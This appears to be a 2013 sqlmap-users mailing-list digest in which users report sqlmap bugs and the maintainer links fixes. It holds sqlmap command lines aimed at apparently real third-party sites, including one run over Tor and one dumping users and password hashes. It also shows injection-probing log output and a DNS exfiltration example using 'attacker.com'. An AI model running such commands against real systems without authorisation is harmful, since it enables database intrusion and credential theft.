>     .bing.com <http://bing.com>       TRUE    /       FALSE   0       _SS     SID=B954CB7EDF8643CABAD8013F27A241E7
>     .bing.com <http://bing.com>       TRUE    /       FALSE   0       _HOP
>     .bing.com <http://bing.com>       TRUE    /       FALSE   0       _FS     NU=1
>     .bing.com <http://bing.com>       TRUE    /       FALSE   1429089794      _FP     EM=1
>     www.bing.com <http://www.bing.com>    FALSE   /       FALSE   1429089794      SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>     www.bing.com <http://www.bing.com>    FALSE   /       FALSE   1429089794      MUIDB   333995A69E06630B2EB491169F016314
>
>     prompt%
>
>     Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>
>     Ok: With the prev rev  ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
>     cookie only for the first 120 tries.
>
>     Cheers, Dirk
>
>
>     >
>     >     Kind regards,
>     >     Miroslav Stampar
>     >
>     >
>     >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> wrote:
>     >
>     >
>     >         Hi Miroslav,
>     >
>     >         thx for your prompt answer.
>     >
>     >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>     >         > Hi Dirk.
>     >         >
>     >         > Could you please get the latest revision and retry it again?
>     >         ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>     >         The slight difference seems to be that in the case where I didn't supply a cookie
>     >         sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
>     >         >
>     >         > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>     >         >
>     >         > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>     >
>     >         sure, here you go:
>     >
>     >         --snip
>     >         # Netscape HTTP Cookie File
>     >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID  \t  <Cookie>
>     >         [..]
>     >         --snap
>     >
>     >         They are all session cookies. For easier reading here I put some blanks in the line
>     >         above, in "cookie-file" there aren't any though. Cookies were generated with
>     >         stompy and a shell script (looks he same as with
>     >         wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>     >
>     >         Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>     >
>     >         >
>     >         > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>     >
>     >         see above.
>     >
>     >         Cheers,
>     >
>     >         Dirk
>     >
>     >         >
>     >         >
>     >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
>     >         >
>     >         >     Hi Miroslav,
>     >         >
>     >         >     yes unfortunately.
>     >         >
>     >         >     If I omit the cookie line in the request header completely, sqlmap
>     >         >     seems to take the first cookie issued by the server with set-cookie (and
>     >         >     put's it silently in).
>     >         >
>     >         >     Cheers,
>     >         >
>     >         >     Dirk
>     >         >
>     >         >
>     >         >
>     >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>     >         >     > Hi.
>     >         >     >
>     >         >     > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>     >         >     >
>     >         >     > Kind regards,
>     >         >     > Miroslav Stampar
>     >         >     >
>     >         >     >
>     >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>>> wrote:
>     >         >     >
>     >         >     >
>     >         >     >     Hi folks,
>     >         >     >
>     >         >     >     .... that doesn't work for me. It always uses the cookie supplied
>     >         >     >     (below in $REQUEST, or if I omit the line in $REQUEST the one
>     >         >     >     from the 1st server reply is being used)
>     >         >     >
>     >         >     >     So what is wrong in here:
>     >         >     >
>     >         >     >     cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>     >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
>     >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>     >         >     >       --level=2 --risk=2 -r $REQUEST
>     >         >     >
>     >         >     >     The content of the file $REQUEST is:
>     >         >     >
>     >         >     >     POST <URL> HTTP/1.1
>     >         >     >     Host: <HOST>
>     >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>     >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>     >         >     >     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>     >         >     >     Accept-Language: en-US,en;q=0.5
>     >         >     >     Accept-Encoding: gzip, deflate
>     >         >     >     Referer: <Referer>
>     >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>     >         >     >     Connection: keep-alive
>     >         >     >     Content-Type: application/x-www-form-urlencoded
>     >         >     >     Content-Length: 67
>     >         >     >
>     >         >     >     <abunchofpostparams>
>     >         >     >
>     >         >     >
>     >         >     >     No hints that cookie-file is not in correct format (I've been through this,
>     >         >     >     at least I think I so ;) ).
>     >         >     >
>     >         >     >     Any insight would be much appreciated.
>     >         >     >
>     >         >     >
>     >         >     >     Cheers,
>     >         >     >
>     >         >     >     Dirk
>     >         >     >
>     >         >     >
>     >         >     >     ------------------------------------------------------------------------------
>     >         >     >     Precog is a next-generation analytics platform capable of advanced
>     >         >     >     analytics on semi-structured data. The platform includes APIs for building
>     >         >     >     apps and a phenomenal toolset for data science. Developers can use
>     >         >     >     our toolset for easy data analysis & visualization. Get a free account!
>     >         >     >     http://www2.precog.com/precogplatform/slashdotnewsletter
>     >         >     >     _______________________________________________
>     >         >     >     sqlmap-users mailing list
>     >         >     >     sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>>>
>     >         >     >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>     >         >     >
>     >         >     >
>     >         >     >
>     >         >     >
>     >         >     > --
>     >         >     > Miroslav Stampar
>     >         >     > http://about.me/stamparm
>     >         >
>     >         >
>     >         >
>     >         >
>     >         > --
>     >         > Miroslav Stampar
>     >         > http://about.me/stamparm
>     >
>     >
>     >
>     >
>     >     --
>     >     Miroslav Stampar
>     >     http://about.me/stamparm
>     >
>     >
>     >
>     >
>     > --
>     > Miroslav Stampar
>     > http://about.me/stamparm
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm




------------------------------

Message: 6
Date: Mon, 15 Apr 2013 14:01:01 -0700
From: <co...@5i...>
Subject: [sqlmap-users] --host parameter
To: sql...@li...
Message-ID:
	<201...@em...>
	
Content-Type: text/plain; charset="utf-8"

Hello,
the --host doesn't work as expected, or I am doing something wrong:


this works as expected:

./sqlmap.py --url='http://i.csland.ro/index.php?id=0'

    sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no
liability and are not responsible for any misuse or damage caused by
this program

[*] starting at 23:57:15

[23:57:15] [INFO] testing connection to the target URL
[23:57:15] [INFO] heuristics detected web page charset 'ascii'
[23:57:15] [INFO] testing if the target URL is stable. This can take a
couple of seconds
[23:57:16] [INFO] target URL is stable
[23:57:16] [INFO] testing if GET parameter 'id' is dynamic
[23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
[23:57:16] [INFO] GET parameter 'id' is dynamic
[23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
might be injectable (possible DBMS: 'MySQL')
[23:57:16] [INFO] testing for SQL injection on GET parameter 'id'


....


this doesn't work as expected:

 ./sqlmap.py --host='i.csland.ro'
--url='http://188.240.236.15/index.php?id=0'

    sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no
liability and are not responsible for any misuse or damage caused by
this program

[*] starting at 23:58:03

[23:58:03] [INFO] testing connection to the target URL
[23:58:03] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to
quit and make sure that everything is set up properly? [Y/n]
[23:58:05] [WARNING] HTTP error codes detected during run:

............


Of course i.csland.ro resolves to 188.240.236.15. Any idea?

Thanks.




------------------------------

Message: 7
Date: Tue, 16 Apr 2013 09:12:05 +1100
From: ???????? ?????? <vo...@s2...>
Subject: [sqlmap-users] Sqlmap and direct connect error
To: sql...@li...
Message-ID: <C59...@s2...>
Content-Type: text/plain; charset=us-ascii

Hi!

This bug detected if add direct param.

python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables --exclude-sysdbs


[01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-de99717
Python version: 2.7.3
Operating system: posix
Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
Technique: None
Back-end DBMS: MySQL (identified)
Traceback (most recent call last):
  File "sqlmap.py", line 87, in main
    start()
  File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start
    action()
  File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
    setHandler()
  File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler
    conf.dbmsConnector.connect()
  File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in connect
    self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", line 93, in Connect
    return Connection(*args, **kwargs)
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 584, in __init__
    self._connect()
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 739, in _connect
    sock.connect((self.host, self.port))
  File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in connect
    raise GeneralProxyError((5, _generalerrors[5]))
GeneralProxyError: (5, 'bad input')




------------------------------

Message: 8
Date: Tue, 16 Apr 2013 14:19:18 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] --host parameter
To: co...@5i...
Cc: SqlMap List <sql...@li...>
Message-ID:
	<CA+...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi.

Thank you for your report and find it fixed with the latest commit [1].

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86


On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:

> Hello,
> the --host doesn't work as expected, or I am doing something wrong:
>
>
> this works as expected:
>
> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:57:15
>
> [23:57:15] [INFO] testing connection to the target URL
> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> [23:57:15] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [23:57:16] [INFO] target URL is stable
> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> [23:57:16] [INFO] GET parameter 'id' is dynamic
> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> might be injectable (possible DBMS: 'MySQL')
> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>
>
> ....
>
>
> this doesn't work as expected:
>
>  ./sqlmap.py --host='i.csland.ro'
> --url='http://188.240.236.15/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:58:03
>
> [23:58:03] [INFO] testing connection to the target URL
> [23:58:03] [CRITICAL] page not found (404)
> it is not recommended to continue in this kind of cases. Do you want to
> quit and make sure that everything is set up properly? [Y/n]
> [23:58:05] [WARNING] HTTP error codes detected during run:
>
> ............
>
>
> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>
> Thanks.
>
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
> apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 9
Date: Tue, 16 Apr 2013 14:33:33 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] Sqlmap and direct connect error
To: ???????? ?????? <vo...@s2...>
Cc: SqlMap List <sql...@li...>
Message-ID:
	<CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
Content-Type: text/plain; charset="koi8-r"

Hi Vladimir.

Find it "patched" with the latest commit [1]. Basically, those combinations
should not be allowed (-d and --url; -d and --tor; etc.) and now we've
added new option validation checks for this kind of cases.

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a


On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:

> Hi!
>
> This bug detected if add direct param.
>
> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
> --exclude-sysdbs
>
>
> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-de99717
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -d
> **************************************************** -u
> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> --exclude-sysdbs
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 87, in main
>     start()
>   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> start
>     action()
>   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>     setHandler()
>   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> setHandler
>     conf.dbmsConnector.connect()
>   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in
> connect
>     self.connector = pymysql.connect(host=self.hostname, user=self.user,
> passwd=self.password, db=self.db, port=self.port,
> connect_timeout=conf.timeout, use_unicode=True)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
> line 93, in Connect
>     return Connection(*args, **kwargs)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 584, in __init__
>     self._connect()
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 739, in _connect
>     sock.connect((self.host, self.port))
>   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
> connect
>     raise GeneralProxyError((5, _generalerrors[5]))
> GeneralProxyError: (5, 'bad input')
>
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
> apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 10
Date: Tue, 16 Apr 2013 23:26:39 +0200
From: buawig <bu...@gm...>
Subject: [sqlmap-users] feature request: offline mode for
	--dns-domain?
To: SqlMap List <sql...@li...>
Message-ID: <516...@gm...>
Content-Type: text/plain; charset=UTF-8

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi,

in cases where sqlmap is run against targets on internal networks it
would be great if one could tell sqlmap to simply proceed without
expecting incoming DNS requests, because sqlmap can not be executed
directly on the DNS server (which can't reach the target, but the
target can reach the DNS server).

For me it would be enough to simply run something like
- -u ... --dns-domain=attacker.com --dns-port=0
(--dns-port does not exist [yet])

to let sqlmap know that it doesn't need to start a DNS listener.

I would then collect and decode the DNS querries on the DNS server
manually, but I could also envision running a second sqlmap instance
on the DNS server with --dns-domain (but without -u) doing that job.

-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p
dGHg7KLwPJ5fM9uXDNodO7cdZF18x6EJOjTJwu6sRNvUwjiAWb7VwAB6HLcts8Qf
WXQL5OUBEzJiYJ/XUVZonPvw+PGc781rNTJDnbW3RKSQK8Hd7T5TgfDE0ucqTCRz
cJ1NbcDswrCQNZtKr09SRW9kxk1QfHsbAGfQYpQh0LrIR3cTageFPLJ+hosMF+VU
uoEiu6k9JJwbWlKCMu2uz/UrLRqdt7VtjhkpbLSLMBL/IOnfTHfdQ37NRYcJIkos
D/sZIyA0MT/woN25rVVDAhxwVZ2MFcxn7eMKXZCxv5VpXZKQxeMtew8maDBwom5C
JdM+bF6AoE56zqi/+qaYajPmO0GYQXy26YUhbRJUufF2ThSTTWnmgZ8QH6fKUbfN
QTGbXyH/FbaXDMDokEButCcrD1PCpvklfz44VU7zi0zG/wBN+mnleT24bvW1tbhx
J1vCEbXWEFCfxwCqTDopLHaGNkIlo4oH4PUsIyW1FlTYQRqH5cUe2bV1F0XcP3/O
yNyHZmLMGtPdEvJ+Wkx8Bp4gcUC2ikKlS6H85TMDu6GxS5oi7EK+kGnJ+njhPeaF
plSWWJFQHEm0DJ/ZCGjgzZyvS8QzK7WDfplpR/TBrc3uOLXZVqDhPW4IkLLc49Vz
N5xHRCVPLLSrPfTPiyIJ
=JSkD
-----END PGP SIGNATURE-----



------------------------------

Message: 11
Date: Tue, 16 Apr 2013 23:24:23 +0200
From: buawig <bu...@gm...>
Subject: [sqlmap-users] feature request: --dns-domain for non-root
	users	(--dns-port)
To: sql...@li...
Message-ID: <516...@gm...>
Content-Type: text/plain; charset=UTF-8

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi,

I just wanted to request a "extension" for a previous feature request
(DNS exfiltration [1]) but after looking at my former feature request
I realized that it included already the feature I was about to request:

- --dns-domain for non-root users:
- --dns-port

The use-case is mentioned in the former feature request:

[1] http://sourceforge.net/mailarchive/message.php?msg_id=27108100
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRbcGHAAoJEJeRHQyF0ukM58gP/1o1qTQTI9bzk3Ez+2wcqign
F0BlB//+rB6CzBPsEvkRioefbJPIcbX9Kcq+IqDygtk8/ux9uR3s1nKyps6nmvY6
EXi4EY0e8uMPc2oXGkMVie1UOYvKiW7apnEEOoIgymLpx/UiXh...
 
[truncated message content]

Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1

[Miroslav S. <mir...@gm...>]

Hi.

Have you been able to retrieve user names normally? I mean, were they
normally been displayed in console output?

Also, is boolean technique the only one detected by sqlmap in your case (or
maybe UNION)?

Kind regards,
Miroslav Stampar


On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:

> Hi friend,
>
>
>    Could you help me with this bug ?
>
>
> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
> run with the latest development version from the GitHub repository. If the
> exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u ***********************************************
> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
> SQL Server --users --passwords
> Technique: BOOLEAN
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
> File "./sqlmap", line 87, in main
> start()
> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
> action()
> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
> conf.dbmsHandler.getPasswordHashes(), "password hash",
> CONTENT_TYPE.PASSWORDS)
> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in
> getPasswordHashes
> if user in retrievedUsers:
> TypeError: unhashable type: 'list'
>
> [*] shutting down at 22:54:12
> Thanks
>
> BOB
>
>
>
>
> ------------------ Original ------------------
> *From: * "sqlmap-users-request"<sql...@li...
> >;
> *Date: * May 29, 2013
> *To: * "sqlmap-users"<sql...@li...>;
> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>
> Send sqlmap-users mailing list submissions to
> sql...@li...
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> or, via email, send a message with subject or body 'help' to
> sql...@li...
>
> You can reach the person managing the list at
> sql...@li...
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of sqlmap-users digest..."
>
>
> Today's Topics:
>
>    1. Re: Feature request (David Guimaraes)
>    2. Re: --load-cookies (Dirk Wetter)
>    3. Re: --load-cookies (Miroslav Stampar)
>    4. Re: Patch for /task/<task_id>/delete in clean_filesystem
>       (Miroslav Stampar)
>    5. Re: --load-cookies (Dirk Wetter)
>    6. --host parameter (co...@5i...)
>    7. Sqlmap and direct connect error (???????? ??????)
>    8. Re: --host parameter (Miroslav Stampar)
>    9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>   10. feature request: offline mode for --dns-domain? (buawig)
>   11. feature request: --dns-domain for non-root users (--dns-port)
>       (buawig)
>   12. Domain credentials (Brian Milliron)
>   13. Re: Domain credentials (Brandon Perry)
>   14. Re: feature request: offline mode for --dns-domain?
>       (Miroslav Stampar)
>   15. Re: Domain credentials (Miroslav Stampar)
>   16. Re: feature request: fetch DNS queries from DNS server via
>       HTTP (buawig)
>   17. Re: feature request: fetch DNS queries from DNS server via
>       HTTP (Miroslav Stampar)
>   18. MySQL error based technique bug (Konrads Smelkovs)
>   19. Re: MySQL error based technique bug (Miroslav Stampar)
>   20. SQLmap crashing (Phillip Wylie)
>   21. Re: SQLmap crashing (Miroslav Stampar)
>   22. Custom injection payload in POST (Marcell Fodor)
>   23. Re: SQLmap crashing (Miroslav Stampar)
>   24. I got error on windows (warezhacking)
>   25. Appending to a dump (Stephen Shkardoon)
>   26. Re: Appending to a dump (Miroslav Stampar)
>   27. Re: Appending to a dump (Stephen Shkardoon)
>   28. Re: Appending to a dump (Miroslav Stampar)
>   29. --ignore-404 ? (buawig)
>   30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (buawig)
>   31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (Miroslav Stampar)
>   32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (Miroslav Stampar)
>   33. Re: --ignore-404 ? (Miroslav Stampar)
>   34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>   35. Re: BUG...!!!! o.O (Miroslav Stampar)
>   36. gun...@gm... wants to follow you. Accept?
>       (gun...@gm...)
>   37. Direct access to mysql database (Marcell Fodor)
>   38. Re: Direct access to mysql database (Miroslav Stampar)
>   39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
>       (Badoo)
>   40. Not getting any sensitive data from database (Marcell Fodor)
>   41. Re: Not getting any sensitive data from database
>       (Miroslav Stampar)
>   42. unhandled exception (kvasilopoulos)
>   43. [SQLMAP] Unhandled exception for IPv6
>       (e.n...@st...)
>   44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>   45. Re: unhandled exception (Miroslav Stampar)
>   46. Passing SOAPAction in --header (Brandon Perry)
>   47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>   48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>   49. Blind SQL Injection question (Guy Dufour)
>   50. Re: Blind SQL Injection question (Chris Oakley)
>   51. Re: Passing SOAPAction in --header (Brandon Perry)
>   52. Re: Passing SOAPAction in --header (Brandon Perry)
>   53. Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Alok Kumar)
>   54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Brandon Perry)
>   55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Alok Kumar)
>   56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Brandon Perry)
>   57. SQLMAP Bug (Joe O'Hara)
>   58. Re: SQLMAP Bug (Miroslav Stampar)
>   59. [CRITICAL] (Thai Thao)
>   60. Re: [CRITICAL] (Miroslav Stampar)
>   61. Providing multiple dbms (Sebastian Nerz)
>   62. Re: Providing multiple dbms (Miroslav Stampar)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sat, 13 Apr 2013 21:40:39 -0300
> From: David Guimaraes <sk...@gm...>
> Subject: Re: [sqlmap-users] Feature request
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CAJ...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Good question Miroslav.. I tried to think in something that can be
> implemented without ruin sqlmap query schema, but I could not come to any
> conclusion... =(
>
> The thing is, sqlsus use a different approch to dump the data, making this
> kind of thing possible...
>
> The solution that I found in this particular scenario is to use sqlsus,
> unfortunately...
>
> Regards.
>
> David
>
>
> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <
> mir...@gm...
> > wrote:
>
> > Hi David.
> >
> > And what do you recommend to be done in case of query with length >
> > max_inj_length?
> >
> > Kind regards,
> > Miroslav Stampar
> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
> >
> >> Hi, I am trying to perform sql injection on a web site but I can not get
> >> successful due to a size limitation on the query sent to the server. The
> >> server is limiting the size of query in 512 bytes only and sqlmap do not
